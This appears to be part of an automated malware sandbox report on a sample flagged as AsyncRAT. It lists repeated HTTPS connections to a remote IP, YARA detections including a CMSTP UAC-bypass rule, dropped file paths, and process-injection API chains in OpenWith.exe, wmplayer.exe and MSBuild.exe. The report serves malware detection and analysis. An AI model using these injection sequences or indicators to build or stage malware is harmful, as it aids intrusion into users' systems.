                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49698
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49671 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49674 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49698 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49677 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
                      Source: unknownHTTPS traffic detected: 104.20.4.235:443 -> 192.168.2.7:49725 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 154.216.19.149:443 -> 192.168.2.7:49724 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 154.216.19.149:443 -> 192.168.2.7:49727 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 154.216.19.149:443 -> 192.168.2.7:49728 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 154.216.19.149:443 -> 192.168.2.7:49732 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 154.216.19.149:443 -> 192.168.2.7:49733 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 154.216.19.149:443 -> 192.168.2.7:49734 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 154.216.19.149:443 -> 192.168.2.7:49735 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 154.216.19.149:443 -> 192.168.2.7:49736 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 154.216.19.149:443 -> 192.168.2.7:49737 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 154.216.19.149:443 -> 192.168.2.7:49738 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 154.216.19.149:443 -> 192.168.2.7:49739 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 154.216.19.149:443 -> 192.168.2.7:49740 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 154.216.19.149:443 -> 192.168.2.7:49741 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 154.216.19.149:443 -> 192.168.2.7:49742 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 154.216.19.149:443 -> 192.168.2.7:49743 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 154.216.19.149:443 -> 192.168.2.7:49744 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 154.216.19.149:443 -> 192.168.2.7:49745 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 154.216.19.149:443 -> 192.168.2.7:49746 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 154.216.19.149:443 -> 192.168.2.7:49747 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 154.216.19.149:443 -> 192.168.2.7:49748 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 154.216.19.149:443 -> 192.168.2.7:49749 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 154.216.19.149:443 -> 192.168.2.7:49750 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 154.216.19.149:443 -> 192.168.2.7:49751 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 154.216.19.149:443 -> 192.168.2.7:49752 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 154.216.19.149:443 -> 192.168.2.7:49753 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 154.216.19.149:443 -> 192.168.2.7:49754 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 154.216.19.149:443 -> 192.168.2.7:49755 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 154.216.19.149:443 -> 192.168.2.7:49756 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 154.216.19.149:443 -> 192.168.2.7:49757 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 154.216.19.149:443 -> 192.168.2.7:49758 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 154.216.19.149:443 -> 192.168.2.7:49759 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 154.216.19.149:443 -> 192.168.2.7:49760 version: TLS 1.2
                      Source: V3.exe, 0000000A.00000003.1325726282.0000000004670000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: DirectInput8Creatememstr_c02683ce-3
                      Source: V3.exe, 0000000A.00000003.1325726282.0000000004670000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: GetRawInputDatamemstr_e06d1c42-3
                      Source: Yara matchFile source: 13.3.OpenWith.exe.4bd0000.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.3.V3.exe.4890000.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.3.OpenWith.exe.4df0000.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.3.V3.exe.4670000.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.3.OpenWith.exe.4df0000.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000000D.00000003.1330348319.0000000004DF0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000003.1325910067.0000000004890000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000003.1325726282.0000000004670000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000D.00000003.1330078113.0000000004BD0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: SendBugReportNew.exe PID: 7368, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: V3.exe PID: 7404, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: OpenWith.exe PID: 7560, type: MEMORYSTR

                      System Summary

                      barindex
                      Source: 23.2.cmd.exe.34407f8.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 32.2.cmd.exe.31c00c8.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                      Source: 14.2.cmd.exe.5152b57.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 23.2.cmd.exe.53fcb57.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 14.2.cmd.exe.59800c8.8.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                      Source: 14.2.cmd.exe.59800c8.8.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                      Source: 14.2.cmd.exe.510da8a.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 9.2.SendBugReportNew.exe.2ec65ce.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 36.2.MSBuild.exe.150000.0.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                      Source: 23.2.cmd.exe.53fd757.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 32.2.cmd.exe.52e1a8a.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 23.2.cmd.exe.53b7a8a.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 32.2.cmd.exe.31c00c8.0.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                      Source: 32.2.cmd.exe.5327757.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 9.2.SendBugReportNew.exe.2ec59ce.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 32.2.cmd.exe.5326b57.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 14.2.cmd.exe.5153757.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 9.2.SendBugReportNew.exe.2e80901.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 00000020.00000002.1996059413.00000000031C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                      Source: 0000000E.00000002.1687453554.0000000005980000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                      Source: 00000024.00000002.1997258638.0000000000152000.00000002.00000001.01000000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                      Source: C:\Users\user\AppData\Local\Temp\tqco, type: DROPPEDMatched rule: Detects AsyncRAT Author: ditekSHen
                      Source: C:\Users\user\AppData\Local\Temp\cfi, type: DROPPEDMatched rule: Detects AsyncRAT Author: ditekSHen
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess Stats: CPU usage > 49%
                      Source: C:\Windows\System32\OpenWith.exeCode function: 17_3_000001F665D830C7 RtlAllocateHeap,RtlAllocateHeap,NtAcceptConnectPort,NtAcceptConnectPort,NtAcceptConnectPort,RtlDeleteBoundaryDescriptor,RtlDeleteBoundaryDescriptor,17_3_000001F665D830C7
                      Source: C:\Windows\System32\OpenWith.exeCode function: 17_3_00007DF4218AC10C NtAcceptConnectPort,17_3_00007DF4218AC10C
                      Source: C:\Windows\System32\OpenWith.exeCode function: 17_3_00007DF4218AD2F4 NtAcceptConnectPort,NtAcceptConnectPort,17_3_00007DF4218AD2F4
                      Source: C:\Windows\System32\OpenWith.exeCode function: 17_3_00007DF4218AC47C NtAcceptConnectPort,17_3_00007DF4218AC47C
                      Source: C:\Windows\System32\OpenWith.exeCode function: 17_3_00007DF4218AB498 NtAcceptConnectPort,_calloc_dbg,DuplicateHandle,NtAcceptConnectPort,NtAcceptConnectPort,NtAcceptConnectPort,NtAcceptConnectPort,NtAcceptConnectPort,NtAcceptConnectPort,NtAcceptConnectPort,NtAcceptConnectPort,NtAcceptConnectPort,NtAcceptConnectPort,17_3_00007DF4218AB498
                      Source: C:\Windows\System32\OpenWith.exeCode function: 17_3_00007DF4218AD3C0 NtAcceptConnectPort,NtAcceptConnectPort,17_3_00007DF4218AD3C0
                      Source: C:\Windows\System32\OpenWith.exeCode function: 17_3_00007DF4218AC70C NtAcceptConnectPort,17_3_00007DF4218AC70C
                      Source: C:\Windows\System32\OpenWith.exeCode function: 17_3_00007DF4218AC7CC NtAcceptConnectPort,17_3_00007DF4218AC7CC
                      Source: C:\Windows\System32\OpenWith.exeCode function: 17_3_00007DF4218AAD14 NtAcceptConnectPort,17_3_00007DF4218AAD14
                      Source: C:\Windows\System32\OpenWith.exeCode function: 17_3_00007DF4218AACC8 NtAcceptConnectPort,17_3_00007DF4218AACC8
                      Source: C:\Windows\System32\OpenWith.exeCode function: 17_3_00007DF4218ABCC0 RtlDosPathNameToNtPathName_U,NtAcceptConnectPort,NtAcceptConnectPort,??3@YAXPEAX@Z,17_3_00007DF4218ABCC0
                      Source: C:\Windows\System32\OpenWith.exeCode function: 17_3_00007DF4218AACE8 NtAcceptConnectPort,17_3_00007DF4218AACE8
                      Source: C:\Windows\System32\OpenWith.exeCode function: 17_3_00007DF4218AAC0C NtAcceptConnectPort,17_3_00007DF4218AAC0C
                      Source: C:\Windows\System32\OpenWith.exeCode function: 17_3_00007DF4218AAF40 NtAcceptConnectPort,17_3_00007DF4218AAF40
                      Source: C:\Windows\System32\OpenWith.exeCode function: 17_3_00007DF4218AAF60 NtAcceptConnectPort,17_3_00007DF4218AAF60
                      Source: C:\Windows\System32\OpenWith.exeCode function: 17_3_00007DF4218ABE6C NtAcceptConnectPort,17_3_00007DF4218ABE6C
                      Source: C:\Windows\System32\OpenWith.exeCode function: 17_3_00007DF4218AAE5C NtAcceptConnectPort,17_3_00007DF4218AAE5C
                      Source: C:\Windows\System32\OpenWith.exeCode function: 17_3_00007DF4218AADD4 NtAcceptConnectPort,17_3_00007DF4218AADD4
                      Source: C:\Windows\System32\OpenWith.exeCode function: 17_2_000001F664381A90 NtAcceptConnectPort,NtAcceptConnectPort,RtlAddVectoredExceptionHandler,17_2_000001F664381A90
                      Source: C:\Windows\System32\OpenWith.exeCode function: 17_2_000001F664380AC8 NtAcceptConnectPort,NtAcceptConnectPort,17_2_000001F664380AC8
                      Source: C:\Windows\System32\OpenWith.exeCode function: 17_2_000001F664381CD0 RtlAllocateHeap,NtAcceptConnectPort,FindCloseChangeNotification,17_2_000001F664381CD0
                      Source: C:\Windows\System32\OpenWith.exeCode function: 17_2_000001F6643815AC NtAcceptConnectPort,17_2_000001F6643815AC
                      Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 26_3_00007DF4ADB71CE8 _calloc_dbg,CreateProcessW,NtResumeThread,FindCloseChangeNotification,??3@YAXPEAX@Z,26_3_00007DF4ADB71CE8
                      Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 26_3_00007DF4ADB71958 _calloc_dbg,NtAllocateVirtualMemory,NtWriteVirtualMemory,NtQueryInformationProcess,NtReadVirtualMemory,NtReadVirtualMemory,NtReadVirtualMemory,NtReadVirtualMemory,NtProtectVirtualMemory,NtProtectVirtualMemory,NtWriteVirtualMemory,NtProtectVirtualMemory,26_3_00007DF4ADB71958
                      Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 26_2_0000023076702418 NtAcceptConnectPort,26_2_0000023076702418
                      Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 26_2_000002307670288C NtAcceptConnectPort,26_2_000002307670288C
                      Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 26_2_00000230767028E8 NtAcceptConnectPort,26_2_00000230767028E8
                      Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 26_2_00000230767028B8 NtAcceptConnectPort,26_2_00000230767028B8
                      Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 26_2_0000023076702990 NtAcceptConnectPort,26_2_0000023076702990
                      Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 26_2_00000230767029D4 NtAcceptConnectPort,26_2_00000230767029D4
                      Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 26_2_00000230767027B8 NtAcceptConnectPort,26_2_00000230767027B8
                      Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 26_2_0000023076702C64 NtAcceptConnectPort,26_2_0000023076702C64
                      Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 26_2_000002307670252C NtAcceptConnectPort,26_2_000002307670252C
                      Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 26_2_00007DF4ADB71E64 CreateProcessW,NtResumeThread,FindCloseChangeNotification,26_2_00007DF4ADB71E64
                      Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 26_2_00007DF4ADB7199C NtQueryInformationProcess,NtReadVirtualMemory,NtProtectVirtualMemory,NtWriteVirtualMemory,26_2_00007DF4ADB7199C
                      Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 26_2_00007DF4ADB82704 NtQuerySystemInformation,??3@YAXPEAX@Z,_malloc_dbg,NtQuerySystemInformation,26_2_00007DF4ADB82704
                      Source: C:\Windows\System32\dllhost.exeCode function: 27_2_00000213BBF5385C NtQuerySystemInformation,27_2_00000213BBF5385C
                      Source: C:\Users\user\Desktop\file.exeCode function: 7_2_00404FAA7_2_00404FAA
                      Source: C:\Users\user\Desktop\file.exeCode function: 7_2_0041206B7_2_0041206B
                      Source: C:\Users\user\Desktop\file.exeCode function: 7_2_0041022D7_2_0041022D
                      Source: C:\Users\user\Desktop\file.exeCode function: 7_2_00411F917_2_00411F91
                      Source: C:\Users\user\AppData\Roaming\Javaoraclev4\YIUEROPTJR\V3.exeCode function: 10_2_00C90BC110_2_00C90BC1
                      Source: C:\Windows\System32\OpenWith.exeCode function: 17_3_000001F665D824F717_3_000001F665D824F7
                      Source: C:\Windows\System32\OpenWith.exeCode function: 17_3_000001F665D85E7C17_3_000001F665D85E7C
                      Source: C:\Windows\System32\OpenWith.exeCode function: 17_3_000001F665D8557C17_3_000001F665D8557C
                      Source: C:\Windows\System32\OpenWith.exeCode function: 17_3_000001F665D858FC17_3_000001F665D858FC
                      Source: C:\Windows\System32\OpenWith.exeCode function: 17_3_000001F665D81BA617_3_000001F665D81BA6
                      Source: C:\Windows\System32\OpenWith.exeCode function: 17_3_000001F665D8279C17_3_000001F665D8279C
                      Source: C:\Windows\System32\OpenWith.exeCode function: 17_3_000001F665D84A3817_3_000001F665D84A38
                      Source: C:\Windows\System32\OpenWith.exeCode function: 17_3_000001F665D82C3C17_3_000001F665D82C3C
                      Source: C:\Windows\System32\OpenWith.exeCode function: 17_3_00007DF4218DB10417_3_00007DF4218DB104
                      Source: C:\Windows\System32\OpenWith.exeCode function: 17_3_00007DF42188263417_3_00007DF421882634
                      Source: C:\Windows\System32\OpenWith.exeCode function: 17_3_00007DF42194A16817_3_00007DF42194A168
                      Source: C:\Windows\System32\OpenWith.exeCode function: 17_3_00007DF4218F20BC17_3_00007DF4218F20BC
                      Source: C:\Windows\System32\OpenWith.exeCode function: 17_3_00007DF4218CF02C17_3_00007DF4218CF02C
                      Source: C:\Windows\System32\OpenWith.exeCode function: 17_3_00007DF42188105817_3_00007DF421881058
                      Source: C:\Windows\System32\OpenWith.exeCode function: 17_3_00007DF42196AF8017_3_00007DF42196AF80
                      Source: C:\Windows\System32\OpenWith.exeCode function: 17_3_00007DF4218FCFB417_3_00007DF4218FCFB4
                      Source: C:\Windows\System32\OpenWith.exeCode function: 17_3_00007DF42197BFCC17_3_00007DF42197BFCC
                      Source: C:\Windows\System32\OpenWith.exeCode function: 17_3_00007DF42196B31817_3_00007DF42196B318
                      Source: C:\Windows\System32\OpenWith.exeCode function: 17_3_00007DF4219772C817_3_00007DF4219772C8
                      Source: C:\Windows\System32\OpenWith.exeCode function: 17_3_00007DF42191E24C17_3_00007DF42191E24C
                      Source: C:\Windows\System32\OpenWith.exeCode function: 17_3_00007DF4218D252417_3_00007DF4218D2524
                      Source: C:\Windows\System32\OpenWith.exeCode function: 17_3_00007DF42196A4A017_3_00007DF42196A4A0
                      Source: C:\Windows\System32\OpenWith.exeCode function: 17_3_00007DF42196847417_3_00007DF421968474
                      Source: C:\Windows\System32\OpenWith.exeCode function: 17_3_00007DF4218E93F417_3_00007DF4218E93F4
                      Source: C:\Windows\System32\OpenWith.exeCode function: 17_3_00007DF4218C43F817_3_00007DF4218C43F8
                      Source: C:\Windows\System32\OpenWith.exeCode function: 17_3_00007DF4218DA43017_3_00007DF4218DA430
                      Source: C:\Windows\System32\OpenWith.exeCode function: 17_3_00007DF42195A3D417_3_00007DF42195A3D4
                      Source: C:\Windows\System32\OpenWith.exeCode function: 17_3_00007DF4218CF3B817_3_00007DF4218CF3B8
                      Source: C:\Windows\System32\OpenWith.exeCode function: 17_3_00007DF4218E96E017_3_00007DF4218E96E0
                      Source: C:\Windows\System32\OpenWith.exeCode function: 17_3_00007DF42188F62417_3_00007DF42188F624
                      Source: C:\Windows\System32\OpenWith.exeCode function: 17_3_00007DF4218DD59417_3_00007DF4218DD594
                      Source: C:\Windows\System32\OpenWith.exeCode function: 17_3_00007DF4218E95D017_3_00007DF4218E95D0
                      Source: C:\Windows\System32\OpenWith.exeCode function: 17_3_00007DF4218D75E417_3_00007DF4218D75E4
                      Source: C:\Windows\System32\OpenWith.exeCode function: 17_3_00007DF4218A996C17_3_00007DF4218A996C
                      Source: C:\Windows\System32\OpenWith.exeCode function: 17_3_00007DF42189F95C17_3_00007DF42189F95C
                      Source: C:\Windows\System32\OpenWith.exeCode function: 17_3_00007DF42196A8BC17_3_00007DF42196A8BC
                      Source: C:\Windows\System32\OpenWith.exeCode function: 17_3_00007DF4218DB7B817_3_00007DF4218DB7B8
                      Source: C:\Windows\System32\OpenWith.exeCode function: 17_3_00007DF42189FB2417_3_00007DF42189FB24
                      Source: C:\Windows\System32\OpenWith.exeCode function: 17_3_00007DF42196FB0417_3_00007DF42196FB04
                      Source: C:\Windows\System32\OpenWith.exeCode function: 17_3_00007DF42197CB0417_3_00007DF42197CB04
                      Source: C:\Windows\System32\OpenWith.exeCode function: 17_3_00007DF4218E9B3817_3_00007DF4218E9B38
                      Source: C:\Windows\System32\OpenWith.exeCode function: 17_3_00007DF4218D9B7017_3_00007DF4218D9B70
                      Source: C:\Windows\System32\OpenWith.exeCode function: 17_3_00007DF4218CFA9417_3_00007DF4218CFA94
                      Source: C:\Windows\System32\OpenWith.exeCode function: 17_3_00007DF4218F9AE017_3_00007DF4218F9AE0
                      Source: C:\Windows\System32\OpenWith.exeCode function: 17_3_00007DF4218DCA3817_3_00007DF4218DCA38
                      Source: C:\Windows\System32\OpenWith.exeCode function: 17_3_00007DF4219669A817_3_00007DF4219669A8
                      Source: C:\Windows\System32\OpenWith.exeCode function: 17_3_00007DF42189D9F017_3_00007DF42189D9F0
                      Source: C:\Windows\System32\OpenWith.exeCode function: 17_3_00007DF421885C2417_3_00007DF421885C24
                      Source: C:\Windows\System32\OpenWith.exeCode function: 17_3_00007DF421926C6017_3_00007DF421926C60
                      Source: C:\Windows\System32\OpenWith.exeCode function: 17_3_00007DF4218EDC5417_3_00007DF4218EDC54
                      Source: C:\Windows\System32\OpenWith.exeCode function: 17_3_00007DF42195EBE417_3_00007DF42195EBE4
                      Source: C:\Windows\System32\OpenWith.exeCode function: 17_3_00007DF4218B0F0417_3_00007DF4218B0F04
                      Source: C:\Windows\System32\OpenWith.exeCode function: 17_3_00007DF4218B9F4C17_3_00007DF4218B9F4C
                      Source: C:\Windows\System32\OpenWith.exeCode function: 17_3_00007DF421969F6817_3_00007DF421969F68
                      Source: C:\Windows\System32\OpenWith.exeCode function: 17_3_00007DF42196AE0017_3_00007DF42196AE00
                      Source: C:\Windows\System32\OpenWith.exeCode function: 17_3_00007DF421891E5417_3_00007DF421891E54
                      Source: C:\Windows\System32\OpenWith.exeCode function: 17_3_00007DF421976DAC17_3_00007DF421976DAC
                      Source: C:\Windows\System32\OpenWith.exeCode function: 17_3_00007DF421963D8417_3_00007DF421963D84
                      Source: C:\Windows\System32\OpenWith.exeCode function: 17_3_00007DF4218CFDE017_3_00007DF4218CFDE0
                      Source: C:\Windows\System32\OpenWith.exeCode function: 17_2_000001F664380C5C17_2_000001F664380C5C
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 25_2_00D4706825_2_00D47068
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 25_2_00D4B55025_2_00D4B550
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 25_2_00D4679825_2_00D46798
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 25_2_00D4645025_2_00D46450
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 25_2_00D40C1025_2_00D40C10
                      Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 26_3_00007DF4ADB74EFC26_3_00007DF4ADB74EFC
                      Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 26_3_00007DF4ADB7392C26_3_00007DF4ADB7392C
                      Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 26_3_00007DF4ADB7220426_3_00007DF4ADB72204
                      Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 26_2_00000230766FC25C26_2_00000230766FC25C
                      Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 26_2_0000023076702D2426_2_0000023076702D24
                      Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 26_2_00000230766F262826_2_00000230766F2628
                      Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 26_2_000002307670727026_2_0000023076707270
                      Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 26_2_000002307673027026_2_0000023076730270
                      Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 26_2_0000023076724A5026_2_0000023076724A50
                      Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 26_2_0000023076733A4D26_2_0000023076733A4D
                      Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 26_2_0000023076723A3826_2_0000023076723A38
                      Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 26_2_0000023076705ADC26_2_0000023076705ADC
                      Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 26_2_000002307670E39826_2_000002307670E398
                      Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 26_2_000002307672CC0026_2_000002307672CC00
                      Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 26_2_000002307671709426_2_0000023076717094
